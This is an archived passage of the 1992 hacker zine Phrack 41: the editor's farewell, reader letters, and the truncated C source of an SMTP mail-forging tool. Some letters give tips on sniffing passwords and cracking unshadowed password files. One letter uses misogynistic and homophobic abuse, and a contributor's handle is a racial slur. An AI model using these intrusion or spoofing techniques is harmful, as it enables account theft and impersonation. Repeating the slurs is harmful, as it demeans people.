home *** CD-ROM | disk | FTP | other *** search
/ Amiga ISO Collection / AmigaDemoCD2.iso / ASCII / TEXTE / SCENE / HPA / PHREAKING / phrack41.lha / phrack41.txt
Encoding:
Text File  |  1993-01-12  |  324.4 KB  |  6,682 lines

  1.               _
  2.              |¬\
  3. /\_______ ___|  \ _______/\
  4. \_____  ¬V. ¬|   V   _____/                    Staff:
  5. _ /  |  .|¦  |  .|___   ¬\ _/\__ _             ~~~~~~
  6.  V. ___ .|°  |  ¦|   |   .V               [Valium]/D&R-FLT
  7. s|¦  |  :|   |  °|   |   ¦|s          SCHWABENPOWER/RAZOR 1911
  8. c|°  |  ¦|   |   |   |   °|c             Le'Clerk/SH¡N¡NG 8
  9. ~~\__|  °|____   A____   /~~             TOM CRUISE / TRSI
  10.      |   |    \_/     \_/ +46 521-11434
  11.  /\__|   |__ _________/\________ _________/\___   ___/\_________ ________  
  12.  \_____    ¬V    ______/       ¬V.   ______/  ¬\_/  ¬\______   ¬V.      ¬\ 
  13. __ /   |   ¦|     ____|. __|  __|:   |   ¬|.          |. __|  __|¦   |   /
  14.   V.   |   °|.   |   ¬|: \__   ¬|¦   |   .|¦   | |    |¦ \__   ¬|°   |  /
  15.   |¦   |____|.   |    |¦   |   .|°   |   :|°   | |   .|°   |    |    |_/
  16.  s|°   |    |:   |    |°   |   ¦|    |   ¦|    | |   :|    |   .|    |s
  17.  c|    |    |¦   |    |    |   °|        °|    | |   ¦|    |   ¦|    |c
  18.  ~~\   _____A°  ______A   ______A_________A   _A_A_  °A______  °A   /~~
  19.     \_/      \_/       \_/                 \_/     \_/       \_/ \_/
  20.  
  21.  
  22.  
  23.             ...Just dial da fukkin` fastest on Amiga...
  24.  
  25.     /\_  __  /\    _    __    _/\  /\    _    _____/\  ___  /\__  /\    _
  26.    /   \/  \/  \  / \  /  \  /   \/  \  / \  /       \/   \/    \/  \  / \
  27.   /    /   /    \/   \/    \/  __/    \/   \/   _    /    /     /    \/   \
  28.  /   _/   /    \     /    \    \/    \     /    /   /    /\    /    \     /
  29.  \  _____/\____/\  _/\  __/\___/\  __/\___/\___/ __/\____/\_  /\____/\  _/
  30.   \/             \/   \/         \/            \/           \/        \/BaK
  31.  
  32.   ______/\  _______ _______  _______  _ ______/\  _____  _______ __/\__
  33.   \____   \/ _____//  __  / /  __  / / \\____   \/  _  \/  __  //   /  \ 
  34.      /    /   _>__/   \  < /   \  < /   \  /    /   /  /   \  < \____  /
  35.      \  _/\  ____/\___/\  \\___/\  \\___/  \  _/\__/ _/\___/\  \/ ____/
  36.       \/   \/           \_/      \_/        \/     \/        \_/\/
  37.  
  38.                         - Nino Brown!/The Silents -
  39.  
  40.                       - Barock! and Hoodlum/Crystal -
  41.  
  42.                         + 4 9 - 2 o 8 - 6 o 9 6 1 4  
  43.                     
  44.                      German Headquarter of the Silents
  45.                     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  46.     
  47.  
  48. No fukkin` free LEECHERS here - lamer!
  49. §
  50.  
  51.                                 ==Phrack Inc.==
  52.  
  53.                    Volume Four, Issue Forty-One, File 1 of 13
  54.  
  55.                                  Issue 41 Index
  56.                               ___________________
  57.  
  58.                                P H R A C K   4 1
  59.  
  60.                                December 31, 1992
  61.                               ___________________
  62.  
  63.                    ~ We've Had A Rest, We're Still The Best ~
  64.  
  65. You've been waiting for this for a while and it's finally here.  A lot has
  66. happened since the last issue.  I guess I should start off with the most
  67. important thing as far as the administration of Phrack is concerned:  Phrack 41
  68. is the last issue for which I will serve as editor.
  69.  
  70. Why?  Well for one, I was in a motorcycle wreck about a month ago and lost the
  71. use of my right arm for a while and, due to the related financial difficulties,
  72. I was forced to sell my computers and some other stuff.
  73.  
  74. Secondly, due to my lack of being a rich boy and having access to a nice
  75. machine, I found it necessary to allow others to help me in putting out the
  76. past several issues and that has resulted in some things being released that I
  77. really wasn't happy with.
  78.  
  79. However, don't get me wrong.  I'm not gonna sit here and dis my friends just
  80. because we differ in opinion about some things.  I think that the overall
  81. quality of the issues has been pretty good and anyone who says it's not can
  82. basically suck my dick, because I don't give a fuck about your opinion anyway.
  83.  
  84. Thirdly, and the most important reason why I am resigning as editor of Phrack,
  85. is a general lack of desire on my part.  I mean the whole reason I even got
  86. involved with doing this was because of hacking -- partly for curiosity and
  87. partly for being able to thumb my nose at the powers that be and other
  88. intellectual types that say, "You can't do/learn about that because we don't
  89. think blah blah blah."  Like I'm supposed to give a fuck what anyone else
  90. thinks.  The type of public service that I think hackers provide is not showing
  91. security holes to whomever has denied their existence, but to merely embarrass
  92. the hell out of those so-called computer security experts and other purveyors
  93. of snake oil.  This is a service that is truly unappreciated and is what keeps
  94. me motivated.  ANYWAY...if you wanna hear me rant some more, maybe I'll get to
  95. do my own Eleeeeet3 Pro-Phile in the future.  Heh!
  96.  
  97. But really, since my acquisition of Phrack, my play time has been hampered and
  98. consequently, I have started to become bored with it.  It was great to meet a
  99. lot of cool people and I learned some things.  It's now time for me to go back
  100. to doing what I like best.  For anyone who's interested in corresponding, I'm
  101. focusing my time on radio communications, HAM radio, scanning, and cellular
  102. telephones.  If you are interested in talking about these things to me or
  103. whatever, feel free to write me at dispater@stormking.com.
  104.  
  105. Aside from all that, I feel that Phrack can be better.  That's why issue 42
  106. will have a new editor and administrative staff.  I'm not saying who, but you
  107. may be surprised.  NO, it's not KL or TK either.
  108.  
  109. And with that, I'm saying adios and, as Adam Grant said, "Don't get caught."
  110.  
  111. Now onto the issue:
  112.  
  113. In this issue's Loopback, Phrack responds to the numerous letters it has
  114. received over the past several months, including the return of Shit Kickin' Jim
  115. and a message from Rop, editor of Hack-Tic.
  116.  
  117. The Racketeer (Rack of The Hellfire Club) continues his Network Miscellany
  118. column with plenty of new information about fake mail.
  119.  
  120. Phrack Pro-Phile focuses on one of the hacking community's most mysterious
  121. figures:  Supernigger.  SN was somewhat involved with the infamous DPAK and has
  122. some words of wisdom to the eleets and other folks who enjoy boasting about
  123. their number of years in "the hacker scene."
  124.  
  125.                             DISPATER, Phrack Editor
  126.  
  127.  
  128.  
  129.       Editor-In-Chief : Dispater
  130.        Eleet Founders : Taran King and Knight Lightning
  131.  Technical Consultant : Mind Mage
  132.    Network Miscellany : The Racketeer [HFC]
  133.                  News : Datastream Cowboy
  134.               Make-up : Hair Club for Men
  135.           Photography : Restricted Data Transmissions
  136.             Publicity : AT&T, BellSouth, and the United States Secret Service
  137.     Creative Stimulus : Camel Cool, Jolt Cola, and Taco Bell
  138.         Other Helpers : Scott Simpson, Zibby, The Weazel, The Fed, El1teZ
  139.                         Everywhere.
  140.  
  141.  
  142.   "For the record, we're hackers who believe information should be free.  All
  143.    information.  The world is full of phunky electronic gadgets and networks
  144.         and we want to share our information with the hacker community."
  145.                         -- Restricted Data Transmissions
  146.  
  147.  
  148.                 "They are satisfying their own appetite to know
  149.                      something that is not theirs to know."
  150.                  -- Assistant District Attorney, Don Ingraham
  151.  
  152.  
  153.        "The notion that how things work is a big secret is simply wrong."
  154.                    -- Hacking/Cracking conference on The WELL
  155.  
  156.  
  157.  
  158.                                 -= Phrack 41 =-
  159.  
  160.  Table Of Contents
  161.  ~~~~~~~~~~~~~~~~~
  162.  1. Introduction by Dispater                                               07K
  163.  2. Phrack Loopback by Dispater and Mind Mage                              52K
  164.  3. Phrack Pro-Phile on Supernigger                                        10K
  165.  4. Network Miscellany by The Racketeer [HFC]                              35K
  166.  5. Pirates Cove by Rambone                                                32K
  167.  6  Hacking AT&T System 75 by Scott Simpson                                20K
  168.  7. How To Build a DMS-10 Switch by The Cavalier                           23K
  169.  8. TTY Spoofing by VaxBuster                                              20K
  170.  9. Security Shortcomings of AppleShare Networks by Bobby Zero             16K
  171. 10. Mall Cop Frequencies by Caligula XXI                                   11K
  172. 11. PWN/Part 1 by Datastream Cowboy                                        46K
  173. 12. PWN/Part 2 by Datastream Cowboy                                        49K
  174. 13. PWN/Part 3 by Datastream Cowboy                                        43K
  175.                                                                    Total: 364K
  176.  
  177.                               There is no America.
  178.                              There is no democracy.
  179.                       There is only IBM and ITT and AT&T.
  180.                                 -- Consolidated
  181. _______________________________________________________________________________
  182.  
  183.                                 ==Phrack Inc.==
  184.  
  185.                    Volume Four, Issue Forty-One, File 2 of 13
  186.  
  187.                           [-=:< Phrack Loopback >:=-]
  188.  
  189.                             By Dispater & Mind Mage
  190.  
  191.      Phrack Loopback is a forum for you, the reader, to ask questions, air
  192. problems, and talk about what ever topic you would like to discuss.  This is
  193. also the place Phrack Staff will make suggestions to you by reviewing various
  194. items of note; books, magazines, software, catalogs, hardware, etc.
  195.  
  196. In this issue:
  197.  
  198.      Comments on Phrack 40                        : Rop Gonggrijp
  199.      Fine Art of Telephony (re: Phrack 40)        : Inhuman
  200.      Question & Comment (BT Tymnet/AS400)         : Otto Synch
  201.      BT Tymnet article in Phrack 40               : Anonymous
  202.      Phrack fraud?                                : Doctor Pizz
  203.      Remarks & Warning!                           : Synaps/Clone1/Feyd
  204.      One Ron Hults (re: Phrack 38 Loopback)       : Ken Martin
  205.      Hacking In Czecho-Slovakia                   : Stalker
  206.      Phrack 40 is Sexist!                         : Ground Zero
  207.      Phrack 40 is Sexist!? (PC Phrack)            : Shit Kickin' Jim
  208.      Misunderstood Hackers Get No Respect         : The Cruiser
  209.      Hackers Should Land In Jail, Not In Press    : Alan Falk
  210.      Anonymous Usenet Posting?                    : Anonymous
  211.      Anonymous Mail Poster                        : Sir Hackalot
  212.      Phrack On The Move                           : Andy Panda-Bear
  213.      Computer Underground Publications Index      : Amadeus
  214.      Pirates v. AT&T: Posters                     : Legacy Irreverent
  215.      Ultrix 4.2 Bug                               : Krynn
  216.      PumpCon Hosed                                : Phil "The Outlander"
  217.      2600 Meeting Disrupted by Law Enforcement    : Emmanuel Goldstein
  218.      Two New Hardcovers                           : Alan J. Rothman
  219. _______________________________________________________________________________
  220.  
  221.  Letters to the Editors
  222.  ~~~~~~~~~~~~~~~~~~~~~~
  223. From: rop@hacktic.nl (Rop Gonggrijp) (Editor of Hack-Tic Magazine)
  224. Date: August 14, 1992
  225. Subject: Comments on Phrack 40
  226.  
  227. My compliments!  You've put out one of the best issues to date.  If you keep
  228. this up I'll have to get jealous!
  229.  
  230.      Rop Gonggrijp (rop@hacktic.nl)        Dangerous and capable of making
  231.      fax: +31 20 6900968                        considerable trouble.
  232.  
  233. ----------
  234.  
  235. From: Inhuman (Sysop of Pentavia BBS)
  236. Date: August 18, 1992
  237. Subject: Fine Art of Telephony
  238.  
  239. I just wanted to let you guys know that the article titled "The Fine Art of
  240. Telephony" was one of the best articles I've seen in Phrack in a long time.
  241.  
  242. I hope to see more information on switching and general telephony in the
  243. future.
  244.  
  245. Thanks,
  246.  
  247. Inhuman
  248.  
  249. ----------
  250.  
  251. Date: October 22, 1992
  252. From: Otto Synch
  253. Subject: Question & Comment
  254.  
  255. Hello,
  256.  
  257. Reading your (huge) Phrack issue #40, and noticing that you were accepting
  258. comments and questions, I decided to post mine.  First of all, please forgive
  259. the English.  I'm French and can't help it :-)
  260.  
  261. My comment:  When I saw in the index that this issue was dealing with BT
  262. Tymnet, I felt very happy because I was looking for such information.  And when
  263. I read it, I felt really disappointed.  Toucan Jones could have reduced his
  264. whole article with the following lines:
  265.  
  266. -> Find any Tymnet number.
  267. -> Dial and wait for the "Please log-in:" prompt.
  268. -> Log as user "help", no password required.
  269. -> Capture everything you want, it's free public information.
  270.  
  271. I must say I was a bit surprised to find this kind of article in a high-quality
  272. magazine such as yours...
  273.  
  274. My question:  I'm currently trying to find out everything about a neat AS/400
  275. I've "found," but I never saw any "hack report" on it.  Do you know if there
  276. are any available?
  277.  
  278. OK - Let's see if you answer.  We feel somewhat lonely here in the Old
  279. Continent...but Phrack is here to keep the challenge up!
  280.  
  281. Regards,
  282.  
  283.       >  Otto Sync  <
  284.  
  285. ----------
  286.  
  287. From: Anonymous
  288. Date: August 19, 1992
  289. Subject: BT Tymnet article in Phrack 40
  290.  
  291. Dear Phrack Staff,
  292.  
  293. The BT Tymnet article in the 40th issue of Phrack was totally lame.  I hate it
  294. when people enter Telenet or Tymnet's information facility and just buffer all
  295. the sh*t that's in there.  Then they have the audacity to slap their name on
  296. the data as if they had made a major network discovery.  That's so f*ck*ng
  297. lame!
  298.  
  299. Phrack should make a policy not to accept such lame sh*t for their fine
  300. magazine.  Is Phrack *that* desperate for articles?  Crap like commercial dial-
  301. up lists is about as lame as posting a few random pages from the front of the
  302. white pages.  The information is quickly outdated and easily available at any
  303. time to anyone.  You don't hack this sh*t.
  304.  
  305. Regards,
  306.  
  307. Anonymous (anonymous because I don't want to hear any lame flames)
  308.  
  309. [Editor's Response:  We agree that buffering some dialup list is not hacking,
  310.                      however, in this specific case, a decision was made that
  311.                      not everyone had ready access to the information or even
  312.                      knew of its existence.  Furthermore and more relevant to
  313.                      why the article appeared in Phrack, an article on Tymnet
  314.                      was appropriate when considering the recent events with
  315.                      the MOD case in New York.
  316.  
  317.                      In the future, you may ask that your letter be printed
  318.                      anonymously, but don't send us anonymous mail.]
  319.  
  320. ----------
  321.  
  322. From: Doctor Pizz
  323. Date: October 12, 1992
  324. Subject: Phrack fraud?
  325.  
  326. I recently received an ad from someone who was selling the full set of Phrack
  327. back issues for $100.00.  I do believe that this is a violation of your rights
  328. to Phrack, as he is obviously selling your work for profit!
  329.  
  330. The address I received to order these disks was:
  331.  
  332.      R.E. Jones
  333.      21067 Jones-Mill
  334.      Long Beach, MS   39560
  335.  
  336. It seems he is also selling the set of NIA files for $50, a set of "Hacking
  337. Programs" for $40, LOD Tech Journals for $25, and lots of viruses.  It sounds
  338. like some sort of copyright violation, or fraud, as he is selling public domain
  339. stuff for personal profit.  At least you should be aware of this.  Anyway, I
  340. look forward to receiving future volumes of Phrack!  Keep up the good work.
  341.  
  342. Good luck in stopping this guy!
  343.  
  344. Thank you,
  345.  
  346. --Doctor Pizz--
  347.  
  348. [Editor's Note: We look forward to hearing what our Phrack readers think about
  349.                 people selling hardcopies of Phrack for their own personal
  350.                 profit.]
  351.  
  352. ----------
  353.  
  354. From: Synaps a/k/a Clone1 a/k/a Feyd
  355. Date: September 2, 1992
  356. Subject: Remarks & Warning!
  357.  
  358. Hi,
  359.  
  360. I've been a regular reader of Phrack for two years now and I approve fully the
  361. way you continue Phrack.  It's really a wonderful magazine and if I can help
  362. its development in France, I'll do as much as I can!  Anyway, this is not
  363. really the goal of my letter and excuse me for my English, which isn't very
  364. good.
  365.  
  366. My remarks are about the way you distribute Phrack.  Sometimes, I don't receive
  367. it fully.  I know this is not your fault and I understand that (this net
  368. sometimes has some problems!).  But I think you could provide a mail server
  369. like NETSERV where we could get back issues by mail and just by MAIL (no FTP).
  370.  
  371. Some people (a lot in France) don't have any access to international FTP and
  372. there are no FTP sites in France which have ANY issues of Phrack.  I did use
  373. some LISTSERV mailers with the send/get facility.  Could you install it on your LISTSERV?
  374.  
  375. My warning is about a "group" (I should say a pseudo-group) founded by Jean
  376. Bernard Condat and called CCCF.  In fact, the JBC have spread his name through
  377. the net to a lot of people in the Underground.  As the Underground place in
  378. France is weak (the D.S.T, anti-hacker staff is very active here and very
  379. efficient), people tend to trust JBC.  He seems (I said SEEMS) to have a good
  380. knowledge in computing, looks kind, and has a lot of resources.  The only
  381. problem is that he makes some "sting" (as you called it some years ago)
  382. operation and uses the information he spied to track hackers.  He organized a
  383. game last year which was "le prix du chaos" (the amount of chaos) where he
  384. asked hackers to prove their capabilities.
  385.  
  386. It was not the real goal of this challenge.  He used all the materials hackers
  387. send him to harass some people and now he "plays" with the normal police and
  388. the secret police (DST) and installs like a trade between himself and them.
  389. It's really scary for the hacking scene in France because a lot of people trust
  390. him (even the television which has no basis to prove if he is really a hacker
  391. as he claims to be or if he is a hacker-tracker as he IS!).  Journalists take
  392. him as a serious source for he says he leads a group of computer enthusiasts.
  393.  
  394. But we discovered that his group doesn't exist.  There is nobody in his group
  395. except his brother and some other weird people (2 or 3) whereas he says there
  396. is 73 people in his club/group.  You should spread this warning to everybody in
  397. the underground because we must show that "stings" are not only for USA!  I
  398. know he already has a database with a lot of information like addresses and
  399. other stuff like that about hackers and then he "plays" with those hackers.
  400.  
  401. Be very careful with this guy.  Too many trust him.  Now it's time to be
  402. "objective" about him and his group!
  403.  
  404. Thanks a lot and goodbye.
  405.  
  406.          Synaps a/k/a Clone1 a/k/a Feyd
  407.  
  408. ----------
  409.  
  410. From: Ken Martin <70712.760@compuserve.com>
  411. Date: November 17, 1992
  412. Subject: One Ron Hults...(Phrack 38 Loopback)
  413.  
  414. Dear Phrack Staff:
  415.  
  416. This letter is concerning the letter in the Phrack Loopback column (#38, April
  417. 20, 1992) written by one Ron Hults.  It suggests that all children should be
  418. disallowed access to a computer with a modem.
  419.  
  420. The news release to which it is attached attempts to put an idea in the
  421. reader's mind that everything out there (on bulletin boards) is bad.  Anyone
  422. who can read messages from "satanic cultists, pedophile, and rapists" can also
  423. read a typical disclaimer found on most bulletin boards which have adult
  424. material and communication areas available to their users, and should be able
  425. to tell the SysOp of a BBS how old he/she is.
  426.  
  427. A child who is intelligent enough to operate a computer and modem should also
  428. be able to decide what is appropriate for him/her to read, and should have the
  429. sense enough to avoid areas of the BBS that could lead to trouble, and not to
  430. give their address and home phone number to the Charles Manson idols.  (It is a
  431. fact that all adolescents have thoughts about sex; nothing can change that.
  432. The operator of a BBS also has the moral responsibility to keep little kids out
  433. of the XXX-Rated GIF downloading area.)
  434.  
  435. One problem with that is BBSes run by the underground type (hack/phreak, these
  436. usually consist of people from 15-30 years of age).  The operators of these let
  437. practically anyone into their system, from my experiences.  These types of
  438. BBSes often have credit card numbers, telephone calling card numbers, access
  439. codes to credit reporting services, etc., usually along with text-file
  440. documents about mischievous topics.  Mr. Hults makes no mention of these in his
  441. letter and press release.  It is my belief that these types of systems are the
  442. real problem.  The kids are fascinated that, all of a sudden, they know how to
  443. make explosives and can get lots of anything for free.
  444.  
  445. I believe that the parents of children should have the sense enough to watch
  446. what they are doing.  If they don't like the kind of information that they're
  447. getting or the kind of messages that they're sending to other users, then that
  448. is the time to restrict access to the modem.
  449.  
  450. I am fifteen years old, and I can say that I have gotten into more than my
  451. share of trouble with the law as a result of information that I have obtained
  452. from BBSes and public communications services like CompuServe.  The computer is
  453. a tool, and it always will be.  Whether it is put to good use or not depends on
  454. its user.  I have put my computer/modem to use in positive applications more
  455. than destructive ones.
  456.  
  457. I would like Mr. Hults to think about his little idea of banning children from
  458. modem use, and to think about the impact it would have on their education.
  459. Many schools use computers/modems in their science and English curriculums for
  460. research purposes.
  461.  
  462. Banning children from telecommunications is like taking away connection to the
  463. outside world and all forms of publication whatsoever when one takes a look
  464. around a large information service like CompuServe or GEnie, and sees all of
  465. the information that a service like this is capable of providing to this
  466. nation.
  467.  
  468. Thanks,
  469.  
  470. Ken Martin (70712.760@compuserve.com)
  471. a.k.a. Scorpion, The Omega Concern, Dr. Scott
  472.  
  473. ----------
  474.  
  475. From: Stalker
  476. Date: October 14, 1992
  477. Subject: Hacking In Czecho-Slovakia
  478.  
  479. Hi there!
  480.  
  481. I'm student from Czecho-Slovakia (for some stupid person who doesn't know, it's
  482. in middle Europe).  Call me Stalker (if there is other guy with this name, call
  483. me what you want).  If you think that computers, networks, hacking and other
  484. interesting things are not in Eastern Europe, you're WRONG.  I won't talk
  485. about politicians. They really make me (and other men from computers) sick!
  486. I'll tell you what is interesting here right now.
  487.  
  488. Our university campus is based on two main systems, VMS and ULTRIX.  There's
  489. VAX 6000, VAX 4000, MicroVAX, VAXStation and some oldtimer machines which run
  490. under VMS.  As for hacking, there's nothing interesting.  You can't do some
  491. tricks with /etc/passwd, there's no main bug in utilities and commands.  But,
  492. as I know, VMS doesn't crypt the packets across the network so you can take
  493. some PC and Netwatch (or any other useful software ) and try to see what
  494. is interesting on the cable.  You can grab anything that you want (usernames,
  495. passwords, etc.).
  496.  
  497. Generally, students hate VMS and love UNIX-like systems.  Other machines are
  498. based on ULTRIX.  We have DECstations (some 3100, some 5000) and one SM 52-12
  499. which is something on VAX-11 :-(.  It is a really slow machine, but it has
  500. Internet access!  There's many users so you can relatively easily run Crack
  501. (excellent program) since passwd is not shadowed.  Another useful thing is tftp
  502. (see some other Crack issues).  There was a machine with enabled tftp, but
  503. after one incident, it was disabled.
  504.  
  505. I would like to tell you more about this incident but sysadmins are still
  506. suspecting (they probably read my mail).  Maybe after some months in other
  507. articles.  Now I can tell you that I'm not a real UNIX-GURU-HACKER, but the
  508. sysadmins thought that I was.  Someone (man or girl, who knows) has hacked one
  509. (or two) machines on our campus.  Administrators thought that I was this
  510. mysterious hacker but I am not!  He/she is much better than I and my friends.
  511. Today no one knows who the hacker is.  The administrator had talked to him/her
  512. and after some weeks, gave him/her an account.  He/she probably had root
  513. privileges for some time and maybe has these today.  He/she uses a modem to
  514. connect.  His/her login name is nemo (Jules Verne is a popular hero).  I will
  515. try to send mail to him/her about Phrack and maybe he/she will write
  516. interesting articles about himself.
  517.  
  518. And some tips.  Phrack is very interesting, but there's other interesting
  519. official files on cert.org (192.88.209.9) available via anonymous FTP.  This
  520. is the Computer Emergency Response Team (CERT) FTP server.  You can find
  521. interesting information here about bugs in actual software, but you will see
  522. only which command or utility has the bug, not how to exploit it.  If you are
  523. smart enough, there's nothing to say.
  524.  
  525. If you are not, you must read Phrack!  :-)
  526.  
  527. Bye,
  528.  
  529. Stalker
  530.  
  531. ----------
  532.  
  533. From: Ground Zero
  534. Date: August 25, 1992
  535. Subject: Phrack 40 is Sexist!
  536.  
  537. Hi, just a quick comment about Phrack's account of SummerCon:
  538.  
  539. I don't think your readers need to know or are really interested in hearing
  540. about the fact that Doc Holiday was busy trying to pick up girls or that there
  541. were some unbalanced teeny-boppers there offering themselves to some of the
  542. SummerCon participants.  Also, as a woman I don't care for your
  543. characterizations of females in that file.
  544.  
  545. I'm not trying to nitpick or be politically correct (I hate PC), I'm just
  546. writing because I felt strongly enough about it.  Ciao.
  547.  
  548. Ground Zero (Editor of Activist Times, Inc./ATI)
  549.  
  550. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  551.  
  552. From: Shit Kickin' Jim
  553. Date: September 11, 1992
  554. Subject: Phrack 40 is Sexist!? (PC Phrack)
  555.  
  556. Listen here woman.  I don't know whut yer big fat butt thinks Phrack wuz tryin'
  557. to insinuate.  Lemme tell yew a thang er two.  First of all, Phrack ain't run
  558. by some little pip-squeek faggot ass pansies.  Ah mean wut are you sum kinda
  559. hOmOsexual?  Here's what ah mean.  NOW here iz a real story 'bout me and one a
  560. my bestest friends: 4x4 Phreaker.
  561.  
  562. See 4x4 Phreaker come down to Texas fur a little hackin adventure.  Even though
  563. he lives up there in Yankee-land, 4x4 Phreaker iz a pretty good ol' boy.
  564. Whuddya think real manly hackers do when they get together?  Go stop by Radio
  565. Shack and buy shrink wrap?
  566.  
  567. HELL NO!  We fuckin' went to Caligula XXI.  Fur yew ol' boys that ain't from
  568. 'round here er yer a fauygut out there that might be readin this, Caligula XXI
  569. specializes in enertainmunt fer gennelmen.
  570.  
  571. Now, me and 4x4 Phreaker didn't go to hawk at some fat nasty sluts like you
  572. might see at your typical Ho-Ho Con.  We went with the purpose in mind of seein
  573. a real movie star.  Yup Christy Canyon was in the house that night.  4x4
  574. Phreaker and me sat down at a table near the front.  At that point I decided
  575. that I'd start trollin for babes.  Yep that's right I whipped out an American
  576. Express Corporate Gold card.  And I'll be damned if it weren't 3 minutes later
  577. me and 4x4 Phreaker had us 2 new found friends for the evening.
  578.  
  579. So anywayz, yew can see we treated these two fine ladies real nice and they
  580. returned the favor.  We even took em to Waffle House the next mornin'.  So I
  581. dunno where yew git off by callin us sexist.  Yer just some Yankee snob big
  582. city high horse woman who expects to be a takin care of.
  583.  
  584. God bless George Bush and his mistress Jennifer whutz her name.
  585.  
  586. :Shit Kickin' Jim (Madder than a bramer bull fightin a mess of wet hornets)
  587.  
  588. _______________________________________________________________________________
  589.  
  590.  Misunderstood Hackers Get No Respect                           August 10, 1992
  591.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  592.  by The Cruiser (ComputerWorld)(Page 24)(Letters to the Editor)
  593.  
  594. I just read the replies to Chris Goggans' "Hackers aren't the real enemy"
  595. [ComputerWorld, June 29], and I thought I'd address a few of the points brought
  596. up.  I'm a hacker -- which means that I'm every system administrator's
  597. nightmare.
  598.  
  599. Hardly.  Many hackers are politically aware activists.  Besides being fueled by
  600. an obsession for mastering technology (I call it a blatant disregard for such),
  601. true hackers live and obey a strict moral code.
  602.  
  603. All this talk about the differences between voyeurism and crime:  Please, let's
  604. stop comparing information access to breaking into someone's house.  The
  605. government can seize computers and equipment from suspected hackers, never to
  606. return it, without even charging a crime.  I will not sit back and let Big
  607. Brother control me.
  608.  
  609. The Cruiser
  610. _______________________________________________________________________________
  611.  
  612.  Hackers Should Land In Jail, Not In Press                     October 19, 1992
  613.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  614.  by Alan Falk (ComputerWorld)(Page 32)(Letters to the Editor)
  615.  
  616. The letters you get from avowed hackers seem to glorify the virtues of hacking.
  617. I find this very disturbing for a simple reason:  It completely ignores the
  618. issue of private property.
  619.  
  620. The computer systems they hack into (pun intended) and the databases they try
  621. to access, as well as the data in the databases, are private property.
  622.  
  623. An analogous argument might be that breaking and entering a jewelry store and
  624. taking off with some valuables is really a way of testing the security controls
  625. at the jeweler's establishment.  They're really just doing it for the
  626. excitement and challenge.
  627. Would they promote voyeurism based on the "logic" that "after all, if they
  628. didn't want me to look, they'd have pulled the drapes closer together?"
  629.  
  630. The fact that there's challenge or excitement involved (or even commitment,
  631. intellect or whatever) does not change the issue.
  632.  
  633. I suggest that hackers who gain entry to systems against the wishes of the
  634. systems' owners should be treated according to the laws regarding unlawful
  635. entry, theft, etc.
  636.  
  637. Alan Falk
  638. Cupertino, California
  639. _______________________________________________________________________________
  640.  
  641.  Anonymous Usenet Posting?
  642.  ~~~~~~~~~~~~~~~~~~~~~~~~~
  643. Date: August 19, 1992
  644. From: Anonymous
  645.  
  646. I've read in Phrack all about the different ways to send fake mail, but do any
  647. of the readers (or Mind Mage) know anything about anonymous newsgroup posting?
  648.  
  649. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  650.  
  651.  Anonymous Mail Poster                                           August 4, 1992
  652.  ~~~~~~~~~~~~~~~~~~~~~
  653.  by Sir Hackalot
  654.  
  655. Here is some C source to a simple "anonymous" mail poster that I wrote a LONG
  656. time ago.  It's just one of many pieces of code I never gave to anyone before.
  657. You may find it useful.  Basically, it will connect to the SMTP port and
  658. automate the sending.  It will allow for multiple recipients on the "To:" line,
  659. and multiple "To:" lines.
  660.  
  661. From: sirh@sirh.com
  662.  
  663. ------ Cut here for fm.c -----
  664. #include <stdio.h>
  665. #include <string.h>
  666. #include <sys/types.h>
  667. #include <sys/socket.h>
  668. #include <netdb.h>
  669. #include <netinet/in.h>
  670. #include <arpa/inet.h>
  671. #include <signal.h>
  672. #include <fcntl.h>
  673. #include <errno.h>
  674.  
  675.  
  676. int openSock(name,port)
  677. char *name;
  678. int port;
  679.  
  680. {
  681.       int mysock,opt=1;
  682.       struct sockaddr_in sin;
  683.       struct hostent *he;
  684.       he = gethostbyname(name);
  685.       if (he == NULL) {
  686.             printf("No host found..\n");
  687.             exit(0);
  688.       }
  689.  
  690.       memcpy((caddr_t)&sin.sin_addr,he->h_addr_list[0],he->h_length);
  691.       sin.sin_port = port;
  692.  
  693.       sin.sin_family = AF_INET;
  694.  
  695.       mysock = socket(AF_INET,SOCK_STREAM,0);
  696.  
  697.       opt = connect(mysock,(struct sockaddr *)&sin,sizeof(sin));
  698.  
  699.       return mysock;
  700.  
  701. }
  702.  
  703. /* This allows us to have many people on one TO line, seperated by
  704.    commas or spaces. */
  705.  
  706. process(s,d)
  707. int d;
  708. char *s;
  709. {
  710.       char *tmp;
  711.       char buf[120];
  712.  
  713.       tmp = strtok(s," ,");
  714.  
  715.       while (tmp != NULL) {
  716.             sprintf(buf,"RCPT TO: %s\n",tmp);
  717.             write(d,buf,strlen(buf));
  718.             tmp = strtok(NULL," ,");
  719.       }
  720.  
  721. }
  722.  
  723.  
  724.  
  725. getAndSendFrom(fd)
  726. int fd;
  727. {
  728.       char from[100];
  729.       char outbound[200];
  730.  
  731.       printf("You must should specify a From address now.\nFrom: ");
  732.       gets(from);
  733.  
  734.       sprintf(outbound,"MAIL FROM: %s\n",from);
  735.       write(fd,outbound,strlen(outbound));
  736.  
  737.  
  738.  
  739. }
  740.  
  741. getAndSendTo(fd)
  742. int fd;
  743. {
  744.       char addrs[100];
  745.  
  746.       printf("Enter Recipients, with a blank line to end.\n");
  747.  
  748.       addrs[0] = '_';
  749.  
  750.       while (addrs[0] != '\0') {
  751.             printf("To: ");
  752.             gets(addrs);
  753.             process(addrs,fd);
  754.       }
  755.  
  756. }
  757.  
  758. getAndSendMsg(fd)
  759. int fd;
  760. {
  761.       char textline[90];
  762.       char outbound[103];
  763.  
  764.       sprintf(textline,"DATA\n");
  765.       write(fd,textline,strlen(textline));
  766.  
  767.  
  768.       printf("You may now enter your message.  End with a period\n\n");
  769.       printf("[---------------------------------------------------------]\n");
  770.  
  771.       textline[0] = '_';
  772.  
  773.       while (textline[0] != '.') {
  774.             gets(textline);
  775.             sprintf(outbound,"%s\n",textline);
  776.             write(fd,outbound,strlen(outbound));
  777.       }
  778.  
  779. }
  780.  
  781.  
  782. main(argc,argv)
  783. int argc;
  784. char *argv[];
  785. {
  786.  
  787.       char text[200];
  788.       int file_d;
  789.  
  790.       /* Get ready to connect to host. */
  791.       printf("SMTP Host: ");
